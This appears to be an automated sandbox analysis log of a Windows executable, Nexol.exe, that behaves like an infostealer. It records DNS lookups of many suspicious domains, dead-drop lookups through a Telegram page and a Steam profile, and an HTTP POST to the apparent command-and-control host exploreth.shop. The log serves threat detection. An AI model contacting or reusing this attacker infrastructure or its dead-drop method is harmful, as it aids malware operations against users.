Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com

Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ttps://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ttps://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite]] equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: astralconnec.icu
Source: global traffic	DNS traffic detected: DNS query: begindecafer.world
Source: global traffic	DNS traffic detected: DNS query: garagedrootz.top
Source: global traffic	DNS traffic detected: DNS query: modelshiverd.icu
Source: global traffic	DNS traffic detected: DNS query: arisechairedd.shop
Source: global traffic	DNS traffic detected: DNS query: catterjur.run
Source: global traffic	DNS traffic detected: DNS query: orangemyther.live
Source: global traffic	DNS traffic detected: DNS query: fostinjec.today
Source: global traffic	DNS traffic detected: DNS query: sterpickced.digital
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: exploreth.shop

Source: unknown

HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: exploreth.shop

Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/accou
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steamx
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fas
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=J1-T6FXbrr0Z&a
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbROVe
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lk--
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
Source: Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/-.
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/1.
Source: Nexol.exe, 00000006.00000002.2544684436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDA
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDAA6k)
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDAuu
Source: Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/k.
Source: Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop:443/gJKDAkoZ
Source: Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop:443/gJKDAsj
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Nexol.exe, 00000006.00000002.2544684436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Nexol.exe, 00000006.00000002.2544684436.0000000001533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/=
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
Source: Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
Source: Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128E
Source: Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128v%f
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Nexol.exe, 00000006.00000002.2543893852.0000000001458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asdawfq
Source: Nexol.exe, 00000006.00000002.2544426651.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49730 version: TLS 1.2
